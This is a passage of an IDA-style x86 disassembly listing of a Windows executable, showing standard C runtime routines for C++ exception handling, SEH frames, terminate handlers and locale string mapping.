push offset dword_4219E8
call __SEH_prolog4
xor edx, edx
mov [ebp+var_1C], edx
mov eax, [ebp+arg_8]
mov ecx, [eax+4]
cmp ecx, edx
jz loc_40BBBF
cmp [ecx+8], dl
jz loc_40BBBF
mov ecx, [eax+8]
cmp ecx, edx
jnz short loc_40BA83
test dword ptr [eax], 80000000h
jz loc_40BBBF
loc_40BA83: ; CODE XREF: sub_40BA48+2Dj
mov eax, [eax]
mov esi, [ebp+arg_4]
test eax, eax
js short loc_40BA90
lea esi, [ecx+esi+0Ch]
loc_40BA90: ; CODE XREF: sub_40BA48+42j
mov [ebp+ms_exc.disabled], edx
xor ebx, ebx
inc ebx
push ebx
test al, 8
jz short loc_40BADC
mov edi, [ebp+arg_0]
push dword ptr [edi+18h]
call sub_410561
pop ecx
pop ecx
test eax, eax
jz loc_40BBA2
push ebx
push esi
call sub_410561
pop ecx
pop ecx
test eax, eax
jz loc_40BBA2
mov eax, [edi+18h]
mov [esi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_40BACD: ; CODE XREF: sub_40BA48+E7j
push eax
call sub_40B7C5
pop ecx
pop ecx
mov [esi], eax
jmp loc_40BBA7
; ---------------------------------------------------------------------------
loc_40BADC: ; CODE XREF: sub_40BA48+51j
mov edi, [ebp+arg_C]
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
test [edi], bl
jz short loc_40BB31
call sub_410561
pop ecx
pop ecx
test eax, eax
jz loc_40BBA2
push ebx
push esi
call sub_410561
pop ecx
pop ecx
test eax, eax
jz loc_40BBA2
push dword ptr [edi+14h]
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
push esi
call sub_407720
add esp, 0Ch
cmp dword ptr [edi+14h], 4
jnz loc_40BBA7
mov eax, [esi]
test eax, eax
jz short loc_40BBA7
add edi, 8
push edi
jmp short loc_40BACD
; ---------------------------------------------------------------------------
loc_40BB31: ; CODE XREF: sub_40BA48+9Fj
cmp [edi+18h], edx
jnz short loc_40BB6E
call sub_410561
pop ecx
pop ecx
test eax, eax
jz short loc_40BBA2
push ebx
push esi
call sub_410561
pop ecx
pop ecx
test eax, eax
jz short loc_40BBA2
push dword ptr [edi+14h]
add edi, 8
push edi
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
call sub_40B7C5
pop ecx
pop ecx
push eax
push esi
call sub_407720
add esp, 0Ch
jmp short loc_40BBA7
; ---------------------------------------------------------------------------
loc_40BB6E: ; CODE XREF: sub_40BA48+ECj
call sub_410561
pop ecx
pop ecx
test eax, eax
jz short loc_40BBA2
push ebx
push esi
call sub_410561
pop ecx
pop ecx
test eax, eax
jz short loc_40BBA2
push dword ptr [edi+18h]
call sub_410561
pop ecx
test eax, eax
jz short loc_40BBA2
test byte ptr [edi], 4
push 0
pop eax
setnz al
inc eax
mov [ebp+var_1C], eax
jmp short loc_40BBA7
; ---------------------------------------------------------------------------
loc_40BBA2: ; CODE XREF: sub_40BA48+62j
; sub_40BA48+73j ...
call sub_40C254
loc_40BBA7: ; CODE XREF: sub_40BA48+8Fj
; sub_40BA48+D7j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_1C]
jmp short loc_40BBC1
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
jmp sub_40C208
; ---------------------------------------------------------------------------
loc_40BBBF: ; CODE XREF: sub_40BA48+19j
; sub_40BA48+22j ...
xor eax, eax
loc_40BBC1: ; CODE XREF: sub_40BA48+169j
call __SEH_epilog4
retn
sub_40BA48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BBC7 proc near ; CODE XREF: sub_40BC58+11p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 8
push offset dword_421A08
call __SEH_prolog4
mov eax, [ebp+arg_8]
test dword ptr [eax], 80000000h
jz short loc_40BBE3
mov ebx, [ebp+arg_4]
jmp short loc_40BBED
; ---------------------------------------------------------------------------
loc_40BBE3: ; CODE XREF: sub_40BBC7+15j
mov ecx, [eax+8]
mov edx, [ebp+arg_4]
lea ebx, [ecx+edx+0Ch]
loc_40BBED: ; CODE XREF: sub_40BBC7+1Aj
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_C]
push esi
push eax
push [ebp+arg_4]
mov edi, [ebp+arg_0]
push edi
call sub_40BA48
add esp, 10h
dec eax
jz short loc_40BC27
dec eax
jnz short loc_40BC3F
push 1
lea eax, [esi+8]
push eax
push dword ptr [edi+18h]
call sub_40B7C5
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push ebx
call sub_4045E5
jmp short loc_40BC3F
; ---------------------------------------------------------------------------
loc_40BC27: ; CODE XREF: sub_40BBC7+3Fj
lea eax, [esi+8]
push eax
push dword ptr [edi+18h]
call sub_40B7C5
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push ebx
call sub_4045E5
loc_40BC3F: ; CODE XREF: sub_40BBC7+42j
; sub_40BBC7+5Ej
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call __SEH_epilog4
retn
sub_40BBC7 endp
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_40C208
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BC58 proc near ; CODE XREF: sub_40BCC4+D4p
; sub_40BDB6+25Dp
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
cmp [ebp+arg_10], 0
jz short loc_40BC71
push [ebp+arg_10]
push ebx
push esi
push [ebp+arg_0]
call sub_40BBC7
add esp, 10h
loc_40BC71: ; CODE XREF: sub_40BC58+7j
cmp [ebp+arg_18], 0
push [ebp+arg_0]
jnz short loc_40BC7D
push esi
jmp short loc_40BC80
; ---------------------------------------------------------------------------
loc_40BC7D: ; CODE XREF: sub_40BC58+20j
push [ebp+arg_18]
loc_40BC80: ; CODE XREF: sub_40BC58+23j
call sub_4045EC
push dword ptr [edi]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
call sub_40B64B
mov eax, [edi+4]
push 100h
push [ebp+arg_14]
inc eax
push [ebp+arg_C]
mov [esi+8], eax
push [ebp+arg_4]
mov ecx, [ebx+0Ch]
push esi
push [ebp+arg_0]
call sub_40B8AC
add esp, 28h
test eax, eax
jz short loc_40BCC2
push esi
push eax
call sub_4045B5
loc_40BCC2: ; CODE XREF: sub_40BC58+61j
pop ebp
retn
sub_40BC58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BCC4 proc near ; CODE XREF: sub_40BDB6+336p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi], 80000003h
jz loc_40BDB3
push edi
call sub_40574D
cmp dword ptr [eax+80h], 0
jz short loc_40BD27
call sub_40574D
lea edi, [eax+80h]
call sub_40553A
cmp [edi], eax
jz short loc_40BD27
cmp dword ptr [esi], 0E0434F4Dh
jz short loc_40BD27
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_4046A4
add esp, 1Ch
test eax, eax
jnz loc_40BDB2
loc_40BD27: ; CODE XREF: sub_40BCC4+22j
; sub_40BCC4+36j ...
mov edi, [ebp+arg_10]
cmp dword ptr [edi+0Ch], 0
jnz short loc_40BD35
call sub_40C254
loc_40BD35: ; CODE XREF: sub_40BCC4+6Aj
mov esi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push esi
push [ebp+arg_18]
push edi
call sub_404816
mov edi, eax
mov eax, [ebp+var_4]
add esp, 14h
cmp eax, [ebp+var_8]
jnb short loc_40BDB2
push ebx
loc_40BD58: ; CODE XREF: sub_40BCC4+EBj
cmp esi, [edi]
jl short loc_40BDA3
cmp esi, [edi+4]
jg short loc_40BDA3
mov eax, [edi+0Ch]
mov ecx, [edi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_40BD79
cmp byte ptr [ecx+8], 0
jnz short loc_40BDA3
loc_40BD79: ; CODE XREF: sub_40BCC4+ADj
lea ebx, [eax-10h]
test byte ptr [ebx], 40h
jnz short loc_40BDA3
push [ebp+arg_1C]
mov esi, [ebp+arg_4]
push [ebp+arg_18]
push 0
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_40BC58
mov esi, [ebp+arg_14]
add esp, 1Ch
loc_40BDA3: ; CODE XREF: sub_40BCC4+96j
; sub_40BCC4+9Bj ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
add edi, 14h
cmp eax, [ebp+var_8]
jb short loc_40BD58
pop ebx
loc_40BDB2: ; CODE XREF: sub_40BCC4+5Dj
; sub_40BCC4+91j
pop edi
loc_40BDB3: ; CODE XREF: sub_40BCC4+Fj
pop esi
leave
retn
sub_40BCC4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BDB6 proc near ; CODE XREF: sub_40C124+D4p
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 2Ch
mov ecx, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_10]
mov eax, [ebx+4]
cmp eax, 80h
push esi
push edi
mov [ebp+var_1], 0
jg short loc_40BDD9
movsx ecx, byte ptr [ecx+8]
jmp short loc_40BDDC
; ---------------------------------------------------------------------------
loc_40BDD9: ; CODE XREF: sub_40BDB6+1Bj
mov ecx, [ecx+8]
loc_40BDDC: ; CODE XREF: sub_40BDB6+21j
cmp ecx, 0FFFFFFFFh
mov [ebp+var_8], ecx
jl short loc_40BDE8
cmp ecx, eax
jl short loc_40BDED
loc_40BDE8: ; CODE XREF: sub_40BDB6+2Cj
call sub_40C254
loc_40BDED: ; CODE XREF: sub_40BDB6+30j
mov esi, [ebp+arg_0]
mov edi, 0E06D7363h
cmp [esi], edi
jnz loc_40C0C8
cmp dword ptr [esi+10h], 3
mov ebx, 19930520h
jnz loc_40BF35
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_40BE25
cmp eax, 19930521h
jz short loc_40BE25
cmp eax, 19930522h
jnz loc_40BF35
loc_40BE25: ; CODE XREF: sub_40BDB6+5Bj
; sub_40BDB6+62j
cmp dword ptr [esi+1Ch], 0
jnz loc_40BF35
call sub_40574D
cmp dword ptr [eax+88h], 0
jz loc_40C107
call sub_40574D
mov esi, [eax+88h]
mov [ebp+arg_0], esi
call sub_40574D
mov eax, [eax+8Ch]
push 1
push esi
mov [ebp+arg_8], eax
call sub_410561
test eax, eax
pop ecx
pop ecx
jnz short loc_40BE70
call sub_40C254
loc_40BE70: ; CODE XREF: sub_40BDB6+B3j
cmp [esi], edi
jnz short loc_40BE9A
cmp dword ptr [esi+10h], 3
jnz short loc_40BE9A
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_40BE8F
cmp eax, 19930521h
jz short loc_40BE8F
cmp eax, 19930522h
jnz short loc_40BE9A
loc_40BE8F: ; CODE XREF: sub_40BDB6+C9j
; sub_40BDB6+D0j
cmp dword ptr [esi+1Ch], 0
jnz short loc_40BE9A
call sub_40C254
loc_40BE9A: ; CODE XREF: sub_40BDB6+BCj
; sub_40BDB6+C2j ...
call sub_40574D
cmp dword ptr [eax+94h], 0
jz loc_40BF35
call sub_40574D
mov edi, [eax+94h]
call sub_40574D
push [ebp+arg_0]
xor esi, esi
mov [eax+94h], esi
call sub_40B7EA
test al, al
pop ecx
jnz short loc_40BF2D
xor ebx, ebx
cmp [edi], ebx
jle short loc_40BEF4
loc_40BED7: ; CODE XREF: sub_40BDB6+13Cj
mov eax, [edi+4]
mov ecx, [ebx+eax+4]
push offset off_423E50
call sub_4033E3
test al, al
jnz short loc_40BEF9
inc esi
add ebx, 10h
cmp esi, [edi]
jl short loc_40BED7
loc_40BEF4: ; CODE XREF: sub_40BDB6+11Fj
; sub_40BDB6+31Cj
jmp sub_40C208
; ---------------------------------------------------------------------------
loc_40BEF9: ; CODE XREF: sub_40BDB6+134j
push 1
push [ebp+arg_0]
call sub_40B771
pop ecx
pop ecx
lea eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_2C]
mov [ebp+arg_0], offset dword_41DC3C
call sub_402FD8
push offset dword_421A24
lea eax, [ebp+var_2C]
push eax
mov [ebp+var_2C], offset off_41DC34
call sub_40456B
loc_40BF2D: ; CODE XREF: sub_40BDB6+119j
mov esi, [ebp+arg_0]
mov edi, 0E06D7363h
loc_40BF35: ; CODE XREF: sub_40BDB6+50j
; sub_40BDB6+69j ...
cmp [esi], edi
jnz loc_40C0C5
cmp dword ptr [esi+10h], 3
jnz loc_40C0C5
mov eax, [esi+14h]
cmp eax, ebx
jz short loc_40BF60
cmp eax, 19930521h
jz short loc_40BF60
cmp eax, 19930522h
jnz loc_40C0C5
loc_40BF60: ; CODE XREF: sub_40BDB6+196j
; sub_40BDB6+19Dj
mov edi, [ebp+arg_10]
cmp dword ptr [edi+0Ch], 0
jbe loc_40C02C
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_10]
push eax
push [ebp+var_8]
push [ebp+arg_18]
push edi
call sub_404816
add esp, 14h
mov edi, eax
loc_40BF86: ; CODE XREF: sub_40BDB6+26Ej
mov eax, [ebp+var_10]
cmp eax, [ebp+var_1C]
jnb loc_40C029
mov eax, [ebp+var_8]
cmp [edi], eax
jg loc_40C01E
cmp eax, [edi+4]
jg short loc_40C01E
mov eax, [edi+10h]
mov [ebp+var_C], eax
mov eax, [edi+0Ch]
test eax, eax
mov [ebp+var_18], eax
jle short loc_40C01E
loc_40BFB2: ; CODE XREF: sub_40BDB6+23Cj
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea ebx, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_14], eax
jle short loc_40BFE7
loc_40BFC4: ; CODE XREF: sub_40BDB6+22Fj
push dword ptr [esi+1Ch]
mov eax, [ebx]
push eax
push [ebp+var_C]
mov [ebp+var_20], eax
call sub_40B5AB
add esp, 0Ch
test eax, eax
jnz short loc_40BFF6
dec [ebp+var_14]
add ebx, 4
cmp [ebp+var_14], eax
jg short loc_40BFC4
loc_40BFE7: ; CODE XREF: sub_40BDB6+20Cj
dec [ebp+var_18]
add [ebp+var_C], 10h
cmp [ebp+var_18], 0
jg short loc_40BFB2
jmp short loc_40C01E
; ---------------------------------------------------------------------------
loc_40BFF6: ; CODE XREF: sub_40BDB6+224j
push [ebp+arg_1C]
mov ebx, [ebp+var_C]
push [ebp+arg_18]
mov [ebp+var_1], 1
push [ebp+var_20]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
mov esi, [ebp+arg_4]
call sub_40BC58
mov esi, [ebp+arg_0]
add esp, 1Ch
loc_40C01E: ; CODE XREF: sub_40BDB6+1E1j
; sub_40BDB6+1EAj ...
inc [ebp+var_10]
add edi, 14h
jmp loc_40BF86
; ---------------------------------------------------------------------------
loc_40C029: ; CODE XREF: sub_40BDB6+1D6j
mov edi, [ebp+arg_10]
loc_40C02C: ; CODE XREF: sub_40BDB6+1B1j
cmp [ebp+arg_14], 0
jz short loc_40C03C
push 1
push esi
call sub_40B771
pop ecx
pop ecx
loc_40C03C: ; CODE XREF: sub_40BDB6+27Aj
cmp [ebp+var_1], 0
jnz loc_40C0F4
mov eax, [edi]
and eax, 1FFFFFFFh
cmp eax, 19930521h
jb loc_40C0F4
mov edi, [edi+1Ch]
test edi, edi
jz loc_40C0F4
push esi
call sub_40B7EA
test al, al
pop ecx
jnz loc_40C0F4
call sub_40574D
call sub_40574D
call sub_40574D
mov [eax+88h], esi
call sub_40574D
cmp [ebp+arg_1C], 0
mov ecx, [ebp+arg_8]
mov [eax+8Ch], ecx
push esi
jnz short loc_40C0A1
push [ebp+arg_4]
jmp short loc_40C0A4
; ---------------------------------------------------------------------------
loc_40C0A1: ; CODE XREF: sub_40BDB6+2E4j
push [ebp+arg_1C]
loc_40C0A4: ; CODE XREF: sub_40BDB6+2E9j
call sub_4045EC
mov esi, [ebp+arg_10]
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_40B64B
add esp, 10h
push dword ptr [esi+1Ch]
call sub_40B863
loc_40C0C5: ; CODE XREF: sub_40BDB6+181j
; sub_40BDB6+18Bj ...
mov ebx, [ebp+arg_10]
loc_40C0C8: ; CODE XREF: sub_40BDB6+41j
cmp dword ptr [ebx+0Ch], 0
jbe short loc_40C0F4
cmp [ebp+arg_14], 0
jnz loc_40BEF4
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_8]
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_40BCC4
add esp, 20h
loc_40C0F4: ; CODE XREF: sub_40BDB6+28Aj
; sub_40BDB6+29Cj ...
call sub_40574D
cmp dword ptr [eax+94h], 0
jz short loc_40C107
call sub_40C254
loc_40C107: ; CODE XREF: sub_40BDB6+85j
; sub_40BDB6+34Aj
pop edi
pop esi
pop ebx
leave
retn
sub_40BDB6 endp
; ---------------------------------------------------------------------------
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_40303E
mov dword ptr [esi], offset off_41DC34
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C124 proc near ; CODE XREF: sub_40463E+21p
; .text:0040469Ap ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_40574D
cmp dword ptr [eax+20Ch], 0
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_0]
mov edi, 0E06D7363h
mov esi, 1FFFFFFFh
mov ebx, 19930522h
jnz short loc_40C16D
mov edx, [ecx]
cmp edx, edi
jz short loc_40C16D
cmp edx, 80000026h
jz short loc_40C16D
mov edx, [eax]
and edx, esi
cmp edx, ebx
jb short loc_40C16D
test byte ptr [eax+20h], 1
jnz loc_40C200
loc_40C16D: ; CODE XREF: sub_40C124+27j
; sub_40C124+2Dj ...
test byte ptr [ecx+4], 66h
jz short loc_40C196
cmp dword ptr [eax+4], 0
jz loc_40C200
cmp [ebp+arg_14], 0
jnz short loc_40C200
push 0FFFFFFFFh
push eax
push [ebp+arg_C]
push [ebp+arg_4]
call sub_40B64B
add esp, 10h
jmp short loc_40C200
; ---------------------------------------------------------------------------
loc_40C196: ; CODE XREF: sub_40C124+4Dj
cmp dword ptr [eax+0Ch], 0
jnz short loc_40C1AE
mov edx, [eax]
and edx, esi
cmp edx, 19930521h
jb short loc_40C200
cmp dword ptr [eax+1Ch], 0
jz short loc_40C200
loc_40C1AE: ; CODE XREF: sub_40C124+76j
cmp [ecx], edi
jnz short loc_40C1E4
cmp dword ptr [ecx+10h], 3
jb short loc_40C1E4
cmp [ecx+14h], ebx
jbe short loc_40C1E4
mov edx, [ecx+1Ch]
mov edx, [edx+8]
test edx, edx
jz short loc_40C1E4
movzx esi, byte ptr [ebp+arg_1C]
push esi
push [ebp+arg_18]
push [ebp+arg_14]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ecx
call edx
add esp, 20h
jmp short loc_40C203
; ---------------------------------------------------------------------------
loc_40C1E4: ; CODE XREF: sub_40C124+8Cj
; sub_40C124+92j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ecx
call sub_40BDB6
add esp, 20h
loc_40C200: ; CODE XREF: sub_40C124+43j
; sub_40C124+53j ...
xor eax, eax
inc eax
loc_40C203: ; CODE XREF: sub_40C124+BEj
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40C124 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C208 proc near ; CODE XREF: sub_40B4CD:loc_40B501p
; sub_40B607+22j ...
ms_exc = CPPEH_RECORD ptr -18h
; FUNCTION CHUNK AT 0040C22F SIZE 00000012 BYTES
push 8
push offset dword_421A60
call __SEH_prolog4
call sub_40574D
mov eax, [eax+78h]
test eax, eax
jz short loc_40C236
and [ebp+ms_exc.disabled], 0
call eax
jmp short loc_40C22F
sub_40C208 endp
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_40C208
loc_40C22F: ; CODE XREF: sub_40C208+1Ej
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_40C236: ; CODE XREF: sub_40C208+16j
call sub_41056E
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40C208
; =============== S U B R O U T I N E =======================================
sub_40C241 proc near ; CODE XREF: sub_40B863+23p
call sub_40574D
mov eax, [eax+7Ch]
test eax, eax
jz short loc_40C24F
call eax
loc_40C24F: ; CODE XREF: sub_40C241+Aj
jmp sub_40C208
sub_40C241 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C254 proc near ; CODE XREF: sub_404816+1Cp
; sub_404816:loc_404877p ...
ms_exc = CPPEH_RECORD ptr -18h
push 8
push offset dword_421A80
call __SEH_prolog4
push off_427F6C
call sub_405543
pop ecx
test eax, eax
jz short loc_40C286
and [ebp+ms_exc.disabled], 0
call eax
jmp short loc_40C27F
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
loc_40C27F: ; CODE XREF: sub_40C254+22j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_40C286: ; CODE XREF: sub_40C254+1Aj
jmp sub_40C208
sub_40C254 endp
; =============== S U B R O U T I N E =======================================
sub_40C28B proc near ; CODE XREF: sub_407EC9+33p
push offset sub_40C208
call sub_4054D7
pop ecx
mov off_427F6C, eax
retn
sub_40C28B endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C2A0 proc near ; CODE XREF: sub_40491E+4Ap
; sub_40B64B+77p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_40F004
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_40C2DF
mov ecx, 2
loc_40C2DF: ; CODE XREF: sub_40C2A0+38j
push ecx
call sub_40F004
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_40C2A0 endp
; =============== S U B R O U T I N E =======================================
sub_40C2EC proc near ; CODE XREF: sub_40C307+220p
; sub_40C307+229p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jz short locret_40C306
sub eax, 8
cmp dword ptr [eax], 0DDDDh
jnz short locret_40C306
push eax
call sub_4039CF
pop ecx
locret_40C306: ; CODE XREF: sub_40C2EC+6j
; sub_40C2EC+11j
retn
sub_40C2EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C307 proc near ; CODE XREF: sub_40C6A9+2Cp
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
xor ebx, ebx
cmp dword_427F70, ebx
push edi
mov esi, ecx
jnz short loc_40C35E
push ebx
push ebx
xor edi, edi
inc edi
push edi
push offset dword_41DC4C
push 100h
push ebx
call ds:dword_41D128 ; LCMapStringW
test eax, eax
jz short loc_40C349
mov dword_427F70, edi
jmp short loc_40C35E
; ---------------------------------------------------------------------------
loc_40C349: ; CODE XREF: sub_40C307+38j
call ds:dword_41D0EC ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_40C35E
mov dword_427F70, 2
loc_40C35E: ; CODE XREF: sub_40C307+1Dj
; sub_40C307+40j ...
cmp [ebp+arg_C], ebx
jle short loc_40C385
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_40C369: ; CODE XREF: sub_40C307+6Aj
dec ecx
cmp [eax], bl
jz short loc_40C376
inc eax
cmp ecx, ebx
jnz short loc_40C369
or ecx, 0FFFFFFFFh
loc_40C376: ; CODE XREF: sub_40C307+65j
mov eax, [ebp+arg_C]
sub eax, ecx
dec eax
cmp eax, [ebp+arg_C]
jge short loc_40C382
inc eax
loc_40C382: ; CODE XREF: sub_40C307+78j
mov [ebp+arg_C], eax
loc_40C385: ; CODE XREF: sub_40C307+5Aj
mov eax, dword_427F70
cmp eax, 2
jz loc_40C53E
cmp eax, ebx
jz loc_40C53E
cmp eax, 1
jnz loc_40C56F
cmp [ebp+arg_18], ebx
mov [ebp+var_8], ebx
jnz short loc_40C3B4
mov eax, [esi]
mov eax, [eax+4]
mov [ebp+arg_18], eax
loc_40C3B4: ; CODE XREF: sub_40C307+A3j
mov esi, ds:dword_41D0A0
xor eax, eax
cmp [ebp+arg_1C], ebx
push ebx
push ebx
push [ebp+arg_C]
setnz al
push [ebp+arg_8]
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_18]
call esi ; MultiByteToWideChar
mov edi, eax
cmp edi, ebx
jz loc_40C56F
jle short loc_40C426
push 0FFFFFFE0h
xor edx, edx
pop eax
div edi
cmp eax, 2
jb short loc_40C426
lea eax, [edi+edi+8]
cmp eax, 400h
ja short loc_40C40D
call sub_410860
mov eax, esp
cmp eax, ebx
jz short loc_40C421
mov dword ptr [eax], 0CCCCh
jmp short loc_40C41E
; ---------------------------------------------------------------------------
loc_40C40D: ; CODE XREF: sub_40C307+F1j
push eax
call sub_403AAC
cmp eax, ebx
pop ecx
jz short loc_40C421
mov dword ptr [eax], 0DDDDh
loc_40C41E: ; CODE XREF: sub_40C307+104j
add eax, 8
loc_40C421: ; CODE XREF: sub_40C307+FCj
; sub_40C307+10Fj
mov [ebp+var_C], eax
jmp short loc_40C429
; ---------------------------------------------------------------------------
loc_40C426: ; CODE XREF: sub_40C307+DAj
; sub_40C307+E6j
mov [ebp+var_C], ebx
loc_40C429: ; CODE XREF: sub_40C307+11Dj
cmp [ebp+var_C], ebx
jz loc_40C56F
push edi
push [ebp+var_C]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call esi ; MultiByteToWideChar
test eax, eax
jz loc_40C52D
mov esi, ds:dword_41D128
push ebx
push ebx
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; LCMapStringW
mov ecx, eax
cmp ecx, ebx
mov [ebp+var_8], ecx
jz loc_40C52D
test word ptr [ebp+arg_4], 400h
jz short loc_40C49D
cmp [ebp+arg_14], ebx
jz loc_40C52D
cmp ecx, [ebp+arg_14]
jg loc_40C52D
push [ebp+arg_14]
push [ebp+arg_10]
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; LCMapStringW
jmp loc_40C52D
; ---------------------------------------------------------------------------
loc_40C49D: ; CODE XREF: sub_40C307+16Bj
cmp ecx, ebx
jle short loc_40C4E6
push 0FFFFFFE0h
xor edx, edx
pop eax
div ecx
cmp eax, 2
jb short loc_40C4E6
lea eax, [ecx+ecx+8]
cmp eax, 400h
ja short loc_40C4CE
call sub_410860
mov esi, esp
cmp esi, ebx
jz short loc_40C52D
mov dword ptr [esi], 0CCCCh
add esi, 8
jmp short loc_40C4E8
; ---------------------------------------------------------------------------
loc_40C4CE: ; CODE XREF: sub_40C307+1AFj
push eax
call sub_403AAC
cmp eax, ebx
pop ecx
jz short loc_40C4E2
mov dword ptr [eax], 0DDDDh
add eax, 8
loc_40C4E2: ; CODE XREF: sub_40C307+1D0j
mov esi, eax
jmp short loc_40C4E8
; ---------------------------------------------------------------------------
